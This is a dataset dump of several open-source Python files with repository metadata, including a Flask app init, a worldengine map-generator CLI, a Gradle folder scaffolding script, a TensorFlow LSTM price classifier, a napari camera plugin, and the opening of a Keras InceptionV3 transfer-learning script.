| 127
|
py
|
Python
|
ssshare/__init__.py
|
centaur679/ShadowSocksShare
|
41f85e9a0adc1322fd8f254a1c1a5360d228507a
|
[
"Apache-2.0"
] | 2,341
|
2019-03-04T05:41:12.000Z
|
2022-03-31T11:30:40.000Z
|
ssshare/__init__.py
|
centaur679/ShadowSocksShare
|
41f85e9a0adc1322fd8f254a1c1a5360d228507a
|
[
"Apache-2.0"
] | 50
|
2019-03-24T01:35:13.000Z
|
2021-09-09T22:59:15.000Z
|
ssshare/__init__.py
|
centaur679/ShadowSocksShare
|
41f85e9a0adc1322fd8f254a1c1a5360d228507a
|
[
"Apache-2.0"
] | 780
|
2019-03-04T07:33:37.000Z
|
2022-03-22T23:32:53.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import Flask
app = Flask(__name__)
app.config.from_object("config")
| 15.875
| 32
| 0.685039
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 52
| 0.409449
|
b0f238f39a9f9a11e1383c07dd66cb298f4de952
| 21,160
|
py
|
Python
|
worldengine/cli/main.py
|
stefan-feltmann/lands
|
b2f1fc3aab4895763160a135d085a17dceb5f58e
|
[
"MIT"
] | null | null | null |
worldengine/cli/main.py
|
stefan-feltmann/lands
|
b2f1fc3aab4895763160a135d085a17dceb5f58e
|
[
"MIT"
] | null | null | null |
worldengine/cli/main.py
|
stefan-feltmann/lands
|
b2f1fc3aab4895763160a135d085a17dceb5f58e
|
[
"MIT"
] | null | null | null |
import sys
from argparse import ArgumentParser
import os
import pickle
import random
import worldengine.generation as geo
from worldengine.common import array_to_matrix, set_verbose, print_verbose
from worldengine.draw import draw_ancientmap_on_file, draw_biome_on_file, draw_ocean_on_file, \
draw_precipitation_on_file, draw_grayscale_heightmap_on_file, draw_simple_elevation_on_file, \
draw_temperature_levels_on_file, draw_riversmap_on_file
from worldengine.plates import world_gen, generate_plates_simulation
from worldengine.step import Step
from worldengine.world import World
from worldengine.version import __version__
VERSION = __version__
OPERATIONS = 'world|plates|ancient_map|info'
SEA_COLORS = 'blue|brown'
STEPS = 'plates|precipitations|full'
def generate_world(world_name, width, height, seed, num_plates, output_dir,
step, ocean_level, world_format='pickle', verbose=True, black_and_white=False):
w = world_gen(world_name, width, height, seed, num_plates, ocean_level,
step, verbose=verbose)
print('') # empty line
print('Producing ouput:')
sys.stdout.flush()
# Save data
filename = "%s/%s.world" % (output_dir, world_name)
with open(filename, "wb") as f:
if world_format == 'pickle':
pickle.dump(w, f, pickle.HIGHEST_PROTOCOL)
elif world_format == 'protobuf':
f.write(w.protobuf_serialize())
else:
print("Unknown format '%s', not saving " % world_format)
print("* world data saved in '%s'" % filename)
sys.stdout.flush()
# Generate images
filename = '%s/%s_ocean.png' % (output_dir, world_name)
draw_ocean_on_file(w.ocean, filename)
print("* ocean image generated in '%s'" % filename)
if step.include_precipitations:
filename = '%s/%s_precipitation.png' % (output_dir, world_name)
draw_precipitation_on_file(w, filename, black_and_white)
print("* precipitation image generated in '%s'" % filename)
filename = '%s/%s_temperature.png' % (output_dir, world_name)
draw_temperature_levels_on_file(w, filename, black_and_white)
print("* temperature image generated in '%s'" % filename)
if step.include_biome:
filename = '%s/%s_biome.png' % (output_dir, world_name)
draw_biome_on_file(w, filename)
print("* biome image generated in '%s'" % filename)
filename = '%s/%s_elevation.png' % (output_dir, world_name)
sea_level = w.sea_level()
draw_simple_elevation_on_file(w.elevation['data'], filename, width=width,
height=height, sea_level=sea_level)
print("* elevation image generated in '%s'" % filename)
return w
def generate_grayscale_heightmap(world, filename):
draw_grayscale_heightmap_on_file(world, filename)
print("+ grayscale heightmap generated in '%s'" % filename)
def generate_rivers_map(world, filename):
draw_riversmap_on_file(world, filename)
print("+ rivers map generated in '%s'" % filename)
def generate_plates(seed, world_name, output_dir, width, height,
num_plates=10):
"""
Eventually this method should be invoked when generation is called at
asked to stop at step "plates", it should not be a different operation
:param seed:
:param world_name:
:param output_dir:
:param width:
:param height:
:param num_plates:
:return:
"""
elevation, plates = generate_plates_simulation(seed, width, height,
num_plates=num_plates)
world = World(world_name, width, height, seed, num_plates, -1.0, "plates")
world.set_elevation(array_to_matrix(elevation, width, height), None)
world.set_plates(array_to_matrix(plates, width, height))
# Generate images
filename = '%s/plates_%s.png' % (output_dir, world_name)
# TODO calculate appropriate sea_level
sea_level = 1.0
draw_simple_elevation_on_file(world.elevation['data'], filename, width,
height, sea_level)
print("+ plates image generated in '%s'" % filename)
geo.center_land(world)
filename = '%s/centered_plates_%s.png' % (output_dir, world_name)
draw_simple_elevation_on_file(world.elevation['data'], filename, width,
height, sea_level)
print("+ centered plates image generated in '%s'" % filename)
def check_step(step_name):
step = Step.get_by_name(step_name)
if step is None:
print("ERROR: unknown step name, using default 'full'")
return Step.get_by_name("full")
else:
return step
def operation_ancient_map(world, map_filename, resize_factor, sea_color,
draw_biome, draw_rivers, draw_mountains,
draw_outer_land_border):
draw_ancientmap_on_file(world, map_filename, resize_factor, sea_color,
draw_biome, draw_rivers, draw_mountains,
draw_outer_land_border)
print("+ ancient map generated in '%s'" % map_filename)
def __get_last_byte__(filename):
with open(filename, 'rb') as input_file:
data = tmp_data = input_file.read(1024 * 1024)
while tmp_data:
tmp_data = input_file.read(1024 * 1024)
if tmp_data:
data = tmp_data
return ord(data[len(data) - 1])
def __varint_to_value__(varint):
# See https://developers.google.com/protocol-buffers/docs/encoding for details
# to convert it to value we must start from the first byte
# and add to it the second last multiplied by 128, the one after
# multiplied by 128 ** 2 and so on
if len(varint) == 1:
return varint[0]
else:
return varint[0] + 128 * __varint_to_value__(varint[1:])
def __get_tag__(filename):
with open(filename, 'rb') as ifile:
# drop first byte, it should tell us the protobuf version and it
# should be normally equal to 8
data = ifile.read(1)
if not data:
return None
done = False
tag_bytes = []
# We read bytes until we find a bit with the MSB not set
while data and not done:
data = ifile.read(1)
if not data:
return None
value = ord(data)
tag_bytes.append(value % 128)
if value < 128:
done = True
# to convert it to value we must start from the last byte
# and add to it the second last multiplied by 128, the one before
# multiplied by 128 ** 2 and so on
return __varint_to_value__(tag_bytes)
def __seems_protobuf_worldfile__(world_filename):
worldengine_tag = __get_tag__(world_filename)
return worldengine_tag == World.worldengine_tag()
def __seems_pickle_file__(world_filename):
last_byte = __get_last_byte__(world_filename)
return last_byte == ord('.')
def load_world(world_filename):
pb = __seems_protobuf_worldfile__(world_filename)
pi = __seems_pickle_file__(world_filename)
if pb and pi:
print("we cannot distinguish if the file is a pickle or a protobuf "
"world file. Trying to load first as protobuf then as pickle "
"file")
try:
return World.open_protobuf(world_filename)
except Exception:
try:
return World.from_pickle_file(world_filename)
except Exception:
raise Exception("Unable to load the worldfile neither as protobuf or pickle file")
elif pb:
return World.open_protobuf(world_filename)
elif pi:
return World.from_pickle_file(world_filename)
else:
raise Exception("The given worldfile does not seem a pickle or a protobuf file")
def print_world_info(world):
print(" name : %s" % world.name)
print(" width : %i" % world.width)
print(" height : %i" % world.height)
print(" seed : %i" % world.seed)
print(" no plates : %i" % world.n_plates)
print(" ocean level : %f" % world.ocean_level)
print(" step : %s" % world.step.name)
print(" has biome : %s" % world.has_biome())
print(" has humidity : %s" % world.has_humidity())
print(" has irrigation : %s" % world.has_irrigation())
print(" has permeability : %s" % world.has_permeability())
print(" has watermap : %s" % world.has_watermap())
print(" has precipitations : %s" % world.has_precipitations())
print(" has temperature : %s" % world.has_temperature())
def main():
parser = ArgumentParser(
usage="usage: %(prog)s [options] [" + OPERATIONS + "]")
parser.add_argument('OPERATOR', nargs='?')
parser.add_argument('FILE', nargs='?')
parser.add_argument(
'-o', '--output-dir', dest='output_dir',
help="generate files in DIR [default = '%(default)s']",
metavar="DIR", default='.')
parser.add_argument(
'-n', '--worldname', dest='world_name',
help="set world name to STR. output is stored in a " +
"world file with the name format 'STR.world'. If " +
"a name is not provided, then seed_N.world, " +
"where N=SEED",
metavar="STR")
# TODO: add description of protocol buffer
parser.add_argument('-b', '--protocol-buffer', dest='protobuf',
action="store_true",
help="Save world file using protocol buffer format. " +
"Default = store using pickle format",
default=False)
parser.add_argument('-s', '--seed', dest='seed', type=int,
help="Use seed=N to initialize the pseudo-random " +
"generation. If not provided, one will be " +
"selected for you.",
metavar="N")
parser.add_argument('-t', '--step', dest='step',
help="Use step=[" + STEPS + "] to specify how far " +
"to proceed in the world generation process. " +
"[default='%(default)s']",
metavar="STR", default="full")
# TODO --step appears to be duplicate of OPERATIONS. Especially if
# ancient_map is added to --step
parser.add_argument('-x', '--width', dest='width', type=int,
help="N = width of the world to be generated " +
"[default=%(default)s]",
metavar="N",
default='512')
parser.add_argument('-y', '--height', dest='height', type=int,
help="N = height of the world to be generated " +
"[default=%(default)s]",
metavar="N",
default='512')
parser.add_argument('-q', '--number-of-plates', dest='number_of_plates',
type=int,
help="N = number of plates [default = %(default)s]",
metavar="N", default='10')
parser.add_argument('--recursion_limit', dest='recursion_limit', type=int,
help="Set the recursion limit [default = %(default)s]",
metavar="N", default='2000')
parser.add_argument('-v', '--verbose', dest='verbose', action="store_true",
help="Enable verbose messages", default=False)
parser.add_argument('--version', dest='version', action="store_true",
help="Display version information", default=False)
parser.add_argument('--bw', '--black-and-white', dest='black_and_white',
action="store_true",
help="generate maps in black and white",
default=False)
# -----------------------------------------------------
g_generate = parser.add_argument_group(
"Generate Options", "These options are only useful in plate and " +
"world modes")
g_generate.add_argument('-r', '--rivers', dest='rivers_map',
help="generate rivers map in FILE", metavar="FILE")
g_generate.add_argument('--gs', '--grayscale-heightmap',
dest='grayscale_heightmap',
help='produce a grayscale heightmap in FILE',
metavar="FILE")
g_generate.add_argument('--ocean_level', dest='ocean_level', type=float,
help='elevation cut off for sea level " +'
'[default = %(default)s]',
metavar="N", default=1.0)
# -----------------------------------------------------
g_ancient_map = parser.add_argument_group(
"Ancient Map Options", "These options are only useful in " +
"ancient_map mode")
g_ancient_map.add_argument('-w', '--worldfile', dest='world_file',
help="FILE to be loaded", metavar="FILE")
g_ancient_map.add_argument('-g', '--generatedfile', dest='generated_file',
help="name of the FILE", metavar="FILE")
g_ancient_map.add_argument(
'-f', '--resize-factor', dest='resize_factor', type=int,
help="resize factor (only integer values). " +
"Note this can only be used to increase " +
"the size of the map [default=%(default)s]",
metavar="N", default='1')
g_ancient_map.add_argument('--sea_color', dest='sea_color',
help="string for color [" + SEA_COLORS + "]",
metavar="S", default="brown")
g_ancient_map.add_argument('--not-draw-biome', dest='draw_biome',
action="store_false",
help="Not draw biome",
default=True)
g_ancient_map.add_argument('--not-draw-mountains', dest='draw_mountains',
action="store_false",
help="Not draw mountains",
default=True)
g_ancient_map.add_argument('--not-draw-rivers', dest='draw_rivers',
action="store_false",
help="Not draw rivers",
default=True)
g_ancient_map.add_argument('--draw-outer-border', dest='draw_outer_border',
action="store_true",
help="Draw outer land border",
default=False)
# TODO: allow for RGB specification as [r g b], ie [0.5 0.5 0.5] for gray
args = parser.parse_args()
if args.version:
usage()
if os.path.exists(args.output_dir):
if not os.path.isdir(args.output_dir):
raise Exception("Output dir exists but it is not a dir")
else:
print('Directory does not exist, we are creating it')
os.makedirs(args.output_dir)
# it needs to be increased to be able to generate very large maps
# the limit is hit when drawing ancient maps
sys.setrecursionlimit(args.recursion_limit)
if args.number_of_plates < 1 or args.number_of_plates > 100:
usage(error="Number of plates should be a in [1, 100]")
operation = "world"
if args.OPERATOR is None:
pass
elif args.OPERATOR is not None and args.OPERATOR.lower() not in OPERATIONS:
parser.print_help()
usage("Only 1 operation allowed [" + OPERATIONS + "]")
else:
operation = args.OPERATOR.lower()
if args.OPERATOR == 'info':
if args.FILE is None:
parser.print_help()
usage("For operation info only the filename should be specified")
if not os.path.exists(args.FILE):
usage("The specified world file does not exist")
random.seed()
if args.seed:
seed = int(args.seed)
else:
seed = random.randint(0, 65536)
if args.world_name:
world_name = args.world_name
else:
world_name = "seed_%i" % seed
step = check_step(args.step)
world_format = 'pickle'
if args.protobuf:
world_format = 'protobuf'
generation_operation = (operation == 'world') or (operation == 'plates')
produce_grayscale_heightmap = args.grayscale_heightmap
if produce_grayscale_heightmap and not generation_operation:
usage(
error="Grayscale heightmap can be produced only during world " +
"generation")
if args.rivers_map and not generation_operation:
usage(error="Rivers map can be produced only during world generation")
print('Worldengine - a world generator (v. %s)' % VERSION)
print('-----------------------')
print(' operation : %s generation' % operation)
if generation_operation:
print(' seed : %i' % seed)
print(' name : %s' % world_name)
print(' width : %i' % args.width)
print(' height : %i' % args.height)
print(' number of plates : %i' % args.number_of_plates)
print(' world format : %s' % world_format)
print(' black and white maps : %s' % args.black_and_white)
print(' step : %s' % step.name)
if produce_grayscale_heightmap:
print(
' + greyscale heightmap in "%s"' % produce_grayscale_heightmap)
else:
print(' (no greyscale heightmap)')
if args.rivers_map:
print(' + rivers map in "%s"' % args.rivers_map)
else:
print(' (no rivers map)')
if operation == 'ancient_map':
print(' resize factor : %i' % args.resize_factor)
print(' world file : %s' % args.world_file)
print(' sea color : %s' % args.sea_color)
print(' draw biome : %s' % args.draw_biome)
print(' draw rivers : %s' % args.draw_rivers)
print(' draw mountains : %s' % args.draw_mountains)
print(' draw land outer border : %s' % args.draw_outer_border)
set_verbose(args.verbose)
if operation == 'world':
print('') # empty line
print('starting (it could take a few minutes) ...')
world = generate_world(world_name, args.width, args.height,
seed, args.number_of_plates, args.output_dir,
step, args.ocean_level, world_format,
args.verbose, black_and_white=args.black_and_white)
if produce_grayscale_heightmap:
generate_grayscale_heightmap(world, produce_grayscale_heightmap)
if args.rivers_map:
generate_rivers_map(world, args.rivers_map)
elif operation == 'plates':
print('') # empty line
print('starting (it could take a few minutes) ...')
generate_plates(seed, world_name, args.output_dir, args.width,
args.height, num_plates=args.number_of_plates)
elif operation == 'ancient_map':
print('') # empty line
print('starting (it could take a few minutes) ...')
# First, some error checking
if args.sea_color == "blue":
sea_color = (142, 162, 179, 255)
elif args.sea_color == "brown":
sea_color = (212, 198, 169, 255)
else:
usage("Unknown sea color: " + args.sea_color +
" Select from [" + SEA_COLORS + "]")
if not args.world_file:
usage(
"For generating an ancient map is necessary to specify the " +
"world to be used (-w option)")
world = load_world(args.world_file)
print_verbose(" * world loaded")
if not args.generated_file:
args.generated_file = "ancient_map_%s.png" % world.name
operation_ancient_map(world, args.generated_file,
args.resize_factor, sea_color,
args.draw_biome, args.draw_rivers,
args.draw_mountains, args.draw_outer_border)
elif operation == 'info':
world = load_world(args.FILE)
print_world_info(world)
else:
raise Exception(
'Unknown operation: valid operations are %s' % OPERATIONS)
print('...done')
def usage(error=None):
print(
' -------------------------------------------------------------------')
print(' Federico Tomassetti and Bret Curtis, 2011-2015')
print(' Worldengine - a world generator (v. %s)' % VERSION)
print(' ')
print(' worldengine <world_name> [operation] [options]')
print(' possible operations: %s' % OPERATIONS)
print(' use -h to see options')
print(
' -------------------------------------------------------------------')
if error:
print("ERROR: %s" % error)
sys.exit(' ')
# -------------------------------
if __name__ == "__main__":
main()
| 41.653543
| 98
| 0.57689
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7,046
| 0.332987
|
b0f3965138dd98bc050b860206e62e5235246cb0
| 1,432
|
py
|
Python
|
poc-api-gateway/init-project.py
|
ronald-pineda/poc
|
b5bdb7eff963b251ea70cf02570c7d0b6cbef5e3
|
[
"Apache-2.0"
] | null | null | null |
poc-api-gateway/init-project.py
|
ronald-pineda/poc
|
b5bdb7eff963b251ea70cf02570c7d0b6cbef5e3
|
[
"Apache-2.0"
] | null | null | null |
poc-api-gateway/init-project.py
|
ronald-pineda/poc
|
b5bdb7eff963b251ea70cf02570c7d0b6cbef5e3
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
import sys
import os
def create_project_folders(projectFolders):
create_folder(fullServicesFolder)
for projectIndex in range(len(projectFolders)):
projectFolder = fullServicesFolder + "/" + projectFolders[projectIndex]
create_folder(projectFolder)
open(projectFolder + "/build.gradle", "w").close()
create_project_subfolders(projectFolder)
f = open(os.getcwd() + "/settings.gradle", "a")
f.write("include '" + servicesFolder +
":" + projectFolders[projectIndex] + "'\n")
f.close()
def create_project_subfolders(projectFolder):
# print(projectFolder)
for srcFolderIndex in range(len(srcFolders)):
srcFolder = projectFolder + "/" + srcFolders[srcFolderIndex] + "/"
# print(srcFolder)
create_folder(srcFolder)
def create_folder(path):
try:
os.mkdir(path)
except OSError:
print ("create_folder failed : %s" % path)
else:
print ("create_folder succeed : %s" % path)
servicesFolder = sys.argv[1]
projectFolders = sys.argv[2].split(',')
# projectFolders = "project1 project2".split(' ')
# servicesFolderName = "/services"
srcFolders = "src src/main src/main/java src/main/resources src/test src/test/java src/test/resources".split(
' ')
currentPath = os.getcwd()
fullServicesFolder = currentPath + "/" + servicesFolder
create_project_folders(projectFolders)
| 30.468085
| 109
| 0.672486
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 361
| 0.252095
|
b0f74b9d843423b3b2ee4eb76a8944598071e925
| 10,133
|
py
|
Python
|
lstm.py
|
mustyoshi/scikit-ta
|
c2a8f4ce2deadaa13d8bd8891aabd096b397e330
|
[
"MIT"
] | 1
|
2018-03-12T19:50:14.000Z
|
2018-03-12T19:50:14.000Z
|
lstm.py
|
mustyoshi/scikit-ta
|
c2a8f4ce2deadaa13d8bd8891aabd096b397e330
|
[
"MIT"
] | null | null | null |
lstm.py
|
mustyoshi/scikit-ta
|
c2a8f4ce2deadaa13d8bd8891aabd096b397e330
|
[
"MIT"
] | 1
|
2020-02-22T21:59:39.000Z
|
2020-02-22T21:59:39.000Z
|
from __future__ import print_function
import tensorflow as tf
from tensorflow.contrib import rnn
import pandas as pd
import numpy as np
import random
import time
import os
import datetime
from tensorflow.python.client import timeline
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
from sklearn.model_selection import train_test_split
from sklearn.metrics import f1_score
from sklearn.pipeline import Pipeline
import mods
#from . import ProductionPipe
if __name__ == "__main__":
# Training Parameters
device="/gpu:0"
learning_rate = .0001
batch_size = (20*5)
display_step = 10
timesteps = 1 # timesteps
num_classes = 2 # MNIST total classes (0-9 digits)
def splitDataFrameIntoSmaller(df, chunkSize = batch_size):
listOfDf = list()
numberChunks = len(df) // chunkSize + 1
for i in range(numberChunks):
listOfDf.append(df[i*chunkSize:(i+1)*chunkSize])
return listOfDf
to_drop = ['Date','Time','Open','High','Low','Close','Volume',"Period_4_Lookforward_p1","Period_4_Lookforward_p2"]
to_bool = []
create = True
if(create):
#df = pd.read_csv('dhy.us.txt',names=["Date","Time","Open","High","Low","Close","Volume","Ope"])
df = pd.read_csv('bac.us.txt')
origs = df[['Close']].copy()
#df = pd.read_csv('combined.csv',header=None,names=["Open","High","Low","Close","Volume"])
prod_pipe = mods.CreatePipeline() #Pipeline([('ft1',ft1),('ft2',ft2),('ft3',ft3)])
df['Period_4_Lookforward_p1'] = (df['Close'].shift(-4).astype(float) > df['Close'].astype(float))
df['Period_4_Lookforward_p2'] =(np.min([df['Low'].shift(-n) for n in range(1,4)],axis=0) > (df['Close'].astype(float)*.99)) #np.amax([df['Close'].shift(-n).astype(float) for n in range(1,4)],axis=0) > df['Close']
df['Period_4_Lookforward'] = (df['Period_4_Lookforward_p1'].astype(bool) == True) & (df['Period_4_Lookforward_p2'].astype(bool) == True)
df = prod_pipe.transform(df)
#to_bool.append('Period_4_Lookforward')
#for b in to_bool:
# df[b] = df[b].astype(bool)
df = df.dropna()
df.drop(df.index[:32], inplace=True,errors="ignore")
#df.to_csv('Hours.csv',index=False)
#df = df.drop(to_drop,axis=1)
df = df.astype(float)
df.to_csv('Hours.csv',index=False,float_format="%.8g")
else:
df = pd.read_csv('Hours.csv')
print(sum(df['Period_4_Lookforward'].values),'total ups',sum(df['Period_4_Lookforward'].values)/len(df))
num_input = len(df.columns)-1
num_hidden =num_input*20 # int((num_input*num_input)//2) # hidden layer num of features
train = df[:int(len(df)*0.9)]
test = df[len(train):]
dfs = splitDataFrameIntoSmaller(train)
training_steps = len(dfs)*100
del dfs[-1]
random.shuffle(dfs)
dfs.append(test)
print(num_input,'inputs')
print(num_hidden,'nodes per layer')
print(len(dfs),'batches')
print(len(test),'test parts')
ind = 0
# Network Parameters
with tf.device(device):
# tf Graph input
X = tf.placeholder("float", [None, timesteps, num_input])
Y = tf.placeholder("float", [None, num_classes])
# Define weights
weights = {
'out': tf.Variable(tf.random_normal([num_hidden, num_classes]))
}
biases = {
'out': tf.Variable(tf.random_normal([num_classes]))
}
def RNN(x, weights, biases):
# Prepare data shape to match `rnn` function requirements
# Current data input shape: (batch_size, timesteps, n_input)
# Required shape: 'timesteps' tensors list of shape (batch_size, n_input)
# Unstack to get a list of 'timesteps' tensors of shape (batch_size, n_input)
x = tf.unstack(x, timesteps, 1)
# Define a lstm cell with tensorflow
lstm_cell1 = rnn.LSTMBlockCell(num_hidden, forget_bias=1.0)
#lstm_cell = rnn.BasicRNNCell(num_hidden)
#lstm_cell = rnn.PhasedLSTMCell(num_hidden)
#lstm_cell2 = rnn.PhasedLSTMCell(num_hidden)
lstm_cell1 = tf.nn.rnn_cell.DropoutWrapper(lstm_cell1, output_keep_prob=0.75)
lstm_cell2 = rnn.LSTMBlockCell(num_hidden, forget_bias=1.0,use_peephole=True)
lstm_cell1 = tf.nn.rnn_cell.DropoutWrapper(lstm_cell1, output_keep_prob=0.75)
lstm_cell = tf.nn.rnn_cell.MultiRNNCell([lstm_cell1,lstm_cell2]*4)
# Get lstm cell output
outputs, states = rnn.static_rnn(lstm_cell, x, dtype=tf.float32)
# Linear activation, using rnn inner loop last output
return tf.matmul(outputs[-1], weights['out']) + biases['out']
logits = RNN(X, weights, biases)
with tf.device("/cpu:0"):
prediction = tf.nn.softmax(logits)
# Define loss and optimizer
loss_op = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(
logits=logits, labels=Y))
#optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
#optimizer = tf.train.AdagradOptimizer(learning_rate=learning_rate)
optimizer = tf.train.AdamOptimizer(learning_rate)
#optimizer = tf.train.FtrlOptimizer(learning_rate)
train_op = optimizer.minimize(loss_op)
# Evaluate model (with test logits, for dropout to be disabled)
correct_pred = tf.equal(tf.argmax(prediction, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
y_p = tf.argmax(prediction, 1)
init = tf.global_variables_initializer()
# Initialize the variables (i.e. assign their default value)
test_len = len(dfs[-1])
test_data = dfs[-1]
closes = origs.loc[test_data.index].values
test_data.reset_index(drop=True,inplace=True)
test_true = test_data['Period_4_Lookforward'].values
test_label = np.array([test_data['Period_4_Lookforward'] == 0,test_data['Period_4_Lookforward'] == 1]).reshape((-1,2))
test_data = test_data.drop(['Period_4_Lookforward'],axis=1)
test_data = test_data.as_matrix()
test_data = test_data.reshape((-1, timesteps, num_input))
max_fails = 10
fails = 0
min_improv = .00000001
min_loss = 99
max_f1 = 0
config = tf.ConfigProto()
config.gpu_options.allow_growth=True
config.intra_op_parallelism_threads=4
config.inter_op_parallelism_threads=4
with tf.Session(config=config) as sess:
# Run the initializer
sess.run(init)
start_time = time.time()
for step in range(1, training_steps+1):
batch_x= dfs[ind]
#print(len(batch_x),'rows')
ind = (ind + 1)%(len(dfs)-1)
y_true = batch_x['Period_4_Lookforward'].values
batch_y =np.array([batch_x['Period_4_Lookforward'] == 0,batch_x['Period_4_Lookforward'] == 1]).reshape((-1,2))
batch_x = batch_x.drop(['Period_4_Lookforward'],axis=1)
# Reshape data to get 28 seq of 28 elements
batch_x = batch_x.as_matrix()
batch_x = batch_x.reshape((batch_size, timesteps, num_input))
# Run optimization op (backprop)
sess.run(train_op, feed_dict={X: batch_x, Y: batch_y})
# if(learning_rate > .0001):
# learning_rate = learning_rate/10
# optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
# train_op = optimizer.minimize(loss_op)
if step % display_step == 0 or step == 1:
# Calculate batch loss and accuracy
loss, acc,y_pred = sess.run([loss_op, accuracy,y_p], feed_dict={X: batch_x,
Y: batch_y})
loss2, acc2,test_pred = sess.run([loss_op, accuracy,y_p], feed_dict={X: test_data,
Y: test_label})
test_f1 = f1_score(test_true,test_pred)
print("Step " + "{:07d}".format(step) + ",L= " + \
"{:.6f}".format(loss) + ",Tr=" + \
"{:.3f}".format(acc) + ",Te=" + \
"{:.3f}".format(acc2) + ",F1(Tr)={:.3f}".format(f1_score(y_true,y_pred)) + \
",F1(Te)={:.8f}".format(test_f1))
if(loss < (min_loss-min_improv) or test_f1 > max_f1):
min_loss = loss
fails = 0
max_f1 = max(max_f1,test_f1)
else:
fails = fails + 1
if(fails > max_fails):
print('Ended early due to failure to improve')
break
duration = time.time() - start_time
print("\nOptimization Finished in {:.4f}s ({:0.8f} per step)\n\tMax of {:.4f}".format(duration,duration/step,max_f1))
# Calculate accuracy for 128 mnist test images
print("Final Testing Accuracy {:0.4f}%".format(f1_score(test_true,sess.run(y_p, feed_dict={X: test_data, Y: test_label}))))
last_price = 0
gain = 1
ind = 0
min_gain = 1
max_gain = 1
for row in test_data:
output = sess.run(y_p,feed_dict={X:[row]})[0]
if(output == 1):
if(last_price == 0):
last_price = closes[ind]
if(closes[ind] < last_price):
gain = gain * (1+((last_price - closes[ind]))*20)
min_gain = min(gain,min_gain)
max_gain = max(gain,max_gain)
last_price = 0
else:
if(last_price != 0):
gain = gain * (1+((last_price - closes[ind]))*20)
min_gain = min(gain,min_gain)
max_gain = max(gain,max_gain)
last_price = 0
ind = ind + 1
print(ind,"rows gives",gain)
print(min_gain," | ",max_gain)
#saver = tf.train.Saver()
#saver.save(sess, "D:\\dev\\forex_17\\model.ckpt")
| 42.936441
| 220
| 0.589954
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,909
| 0.287082
|
b0f85d4de8f913a7c50b0d59c38e3f8dc18c049b
| 2,375
|
py
|
Python
|
src/napari_live_recording/__init__.py
|
jethro33/napari-live-recording
|
6c3fcc33bd18cd090e3f89971b630d1800e29e4d
|
[
"MIT"
] | 7
|
2021-10-11T17:45:33.000Z
|
2022-02-07T16:10:42.000Z
|
src/napari_live_recording/__init__.py
|
jethro33/napari-live-recording
|
6c3fcc33bd18cd090e3f89971b630d1800e29e4d
|
[
"MIT"
] | 2
|
2021-11-01T09:00:11.000Z
|
2022-01-24T16:21:05.000Z
|
src/napari_live_recording/__init__.py
|
jethro33/napari-live-recording
|
6c3fcc33bd18cd090e3f89971b630d1800e29e4d
|
[
"MIT"
] | null | null | null |
from napari.viewer import Viewer
import napari_live_recording.devices as devices
from napari_live_recording.widgets import CameraSelection
from napari_live_recording.control import Controller
from qtpy.QtWidgets import QWidget, QFormLayout, QGroupBox
class NapariLiveRecording(QWidget):
def __init__(self, napari_viewer : Viewer) -> None:
super().__init__()
self.viewer = napari_viewer
self.mainLayout = QFormLayout()
self.selectionWidget = CameraSelection()
self.selectionWidget.setAvailableCameras(list(devices.devicesDict.keys()))
self.controller = Controller(self)
self.mainLayout.addRow(self.selectionWidget.group)
self.viewer.layers.events.removed.connect(self.controller.clearAlbumBuffer)
# Creates a new camera object and passes it to the controller
# whenever the add button is pressed
self.selectionWidget.newCameraRequested.connect(self.addNewCamera)
self.controller.cameraDeleted.connect(self.deleteCameraWidget)
self.setLayout(self.mainLayout)
def addNewCamera(self, type: str, name, idx: str) -> None:
camera = devices.devicesDict[type](name, idx)
self.mainLayout.addRow(self.controller.addCamera(camera))
def deleteCameraWidget(self, widget: QGroupBox) -> None:
self.mainLayout.removeRow(widget)
def refreshViewer(self, img, layerName) -> None:
""" Slot triggered every time a camera acquires a frame.
Creates a new layer on the viewer with the received image as content.
If the layer already exists, it updates its content.
Args:
img (np.ndarray): image data.
layerName (str): name of the layer to create/update.
"""
if img is not None:
try:
# layer is recreated in case the image changes type (i.e. grayscale -> RGB and viceversa)
if img.ndim != self.viewer.layers[layerName].data.ndim:
self.viewer.layers.remove(layerName)
self.viewer.add_image(img, name = layerName)
else:
self.viewer.layers[layerName].data = img
except KeyError:
# needed in case the layer of that live recording does not exist
self.viewer.add_image(img, name = layerName)
| 45.673077
| 105
| 0.663579
| 2,123
| 0.893895
| 0
| 0
| 0
| 0
| 0
| 0
| 579
| 0.243789
|
b0f8a636893a665d94b32f86e052882874326b1a
| 4,277
|
py
|
Python
|
Chapter08/inceptionV3.py
|
wikibook/deep-learning-reference
|
18d2ca2ded4256b2ddbac6e76d57531ca13e6e30
|
[
"MIT"
] | 2
|
2020-02-13T05:45:20.000Z
|
2020-04-11T05:58:02.000Z
|
Chapter08/inceptionV3.py
|
wikibook/deep-learning-reference
|
18d2ca2ded4256b2ddbac6e76d57531ca13e6e30
|
[
"MIT"
] | null | null | null |
Chapter08/inceptionV3.py
|
wikibook/deep-learning-reference
|
18d2ca2ded4256b2ddbac6e76d57531ca13e6e30
|
[
"MIT"
] | null | null | null |
# Deep Learning Quick Reference Chapter 8: Transfer Learning
# Mike Bernico <mike.bernico@gmail.com>
# seed random number generators before importing keras
import numpy as np
np.random.seed(42)
import tensorflow as tf
tf.set_random_seed(42)
from keras.applications.inception_v3 import InceptionV3
from keras.models import Model
from keras.layers import Dense, GlobalAveragePooling2D
from keras.callbacks import TensorBoard, EarlyStopping, CSVLogger, ModelCheckpoint
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import SGD
import os
import argparse
def build_model_feature_extraction():
# create the base pre-trained model
base_model = InceptionV3(weights='imagenet', include_top=False)
# add a global spatial average pooling layer
x = base_model.output
x = GlobalAveragePooling2D()(x)
# let's add a fully-connected layer
x = Dense(1024, activation='relu')(x)
# and a logistic layer
predictions = Dense(1, activation='sigmoid')(x)
# this is the model we will train
model = Model(inputs=base_model.input, outputs=predictions)
